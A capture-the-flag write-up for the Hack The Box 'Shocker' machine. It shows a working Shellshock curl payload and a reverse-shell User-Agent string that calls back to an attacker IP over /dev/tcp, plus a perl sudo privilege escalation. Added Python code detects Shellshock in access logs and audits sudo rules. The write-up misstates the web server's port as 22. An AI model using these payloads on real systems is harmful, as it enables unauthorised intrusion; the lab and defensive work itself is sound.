Shocker

https://app.hackthebox.com/machines/Shocker

Starting with an Nmap scan, we see 2 ports open; the one of interest is the HTTP web server on port 22.

Let's try to find directories:

dirb http://10.129.101.205

The index page does not seem very important ->

But the other directories are forbidden:

After further enumeration, I found this user.sh:

gobuster dir -u http://10.129.101.205/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .sh

When we request the resource, it downloads the file:

Captured the packet containing the script:

I found this helpful site, https://www.sevenlayers.com/index.php/125-exploiting-shellshock, on how to exploit this type of environment (a CGI script served by a Shellshock-vulnerable bash):

curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.90.59/cgi-bin/test.sh

So we have RCE; let's use it. First we start a listener:

After a bit of debugging of the reverse-shell User-Agent payload:

() { ignored;};/bin/bash -i >& /dev/tcp/10.10.14.86/4444 0>&1

And the rest is history:
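From the defender's side, both the curl probe above and the reverse-shell User-Agent share one signature: an exported-function definition `() { ... };` followed by extra commands, delivered in a header that the CGI handler copies into an environment variable. The following detector is an added example, not code from the original writeup: it parses Apache combined-format access log lines (the sample lines are constructed for this example, with made-up IPs and timestamps), checks the User-Agent and Referer fields for that pattern, and flags requests aimed at `/cgi-bin/`.

```python
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample access log (Apache "combined" format) for this example.
# The two 10.0.0.7 requests carry Shellshock-style payloads; the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:12:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"
10.0.0.7 - - [10/Oct/2023:12:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { :;}; /bin/bash -c id" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2023:12:01:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shellshock marker: a bash function definition "() { ... }" immediately followed by ";"
# (anything after the semicolon is what a vulnerable bash would execute on import).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Header-derived fields that CGI exposes as environment variables (HTTP_USER_AGENT, HTTP_REFERER).
HEADER_FIELDS = ("ua", "referer")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into its named fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_shellshock(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per header field that carries a Shellshock-style payload."""
    findings: List[Dict[str, object]] = []
    for raw in lines:
        rec = parse_line(raw.rstrip("\n"))
        if rec is None:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else ""
        for field in HEADER_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "ip": rec["ip"],
                    "timestamp": rec["ts"],
                    "path": path,
                    "field": field,
                    # A CGI target makes the header-to-environment path real, so rank it higher.
                    "cgi_target": "/cgi-bin/" in path,
                    "payload": rec[field],
                })
    return findings


if __name__ == "__main__":
    for hit in detect_shellshock(SAMPLE_LOG.splitlines()):
        sev = "HIGH" if hit["cgi_target"] else "MEDIUM"
        print(f"[{sev}] {hit['ip']} {hit['path']} via {hit['field']}: {hit['payload']}")
```

Run it over a real access log with `detect_shellshock(open("access.log"))`; the same regex can be dropped into a WAF or IDS rule, and the `cgi_target` flag is what separates a scanner spraying headers at static pages from a request that actually reached an executable handler.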

Then a quick enumeration for privilege escalation:

Now we see we can run perl via sudo -> let's check GTFOBins.

Easy win on this privesc ->
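The root cause of this privesc is a sudo rule that hands an interpreter to a low-privilege account, which any administrator can catch before an attacker does. The audit below is an added example, not code from the writeup: it parses the text form of `sudo -l` output (the sample block is constructed, with a placeholder user and host) and flags rules granting `ALL` or a known shell-spawning interpreter, noting whether `NOPASSWD` is set.

```python
import os
import re
from typing import Dict, List

# Constructed sample "sudo -l" output for this example (user and host names are placeholders).
SAMPLE_SUDO_L = """\
Matching Defaults entries for webuser on example-host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User webuser may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/perl
    (root) /bin/ls
"""

# One privilege line of "sudo -l" output: "(runas) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# Binaries that give the caller an arbitrary shell once run with elevated privileges.
INTERPRETERS = {
    "perl", "python", "python2", "python3", "ruby", "bash", "sh", "dash",
    "env", "awk", "vi", "vim", "less", "more", "find",
}


def audit_sudo_l(text: str) -> List[Dict[str, object]]:
    """Return one finding per sudo rule that is equivalent to a root shell."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted ALL"
            elif binary in INTERPRETERS:
                reason = f"{binary} can spawn a shell"
            else:
                continue
            findings.append({
                "runas": m.group("runas").strip(),
                "command": cmd,
                "nopasswd": nopasswd,
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for hit in audit_sudo_l(SAMPLE_SUDO_L):
        auth = "no password" if hit["nopasswd"] else "password required"
        print(f"({hit['runas']}) {hit['command']}: {hit['reason']} [{auth}]")
```

The fix on the host side is to remove the rule or replace the interpreter with a purpose-built wrapper script that takes no user-controlled arguments; the audit can be run periodically with `audit_sudo_l(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)`.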
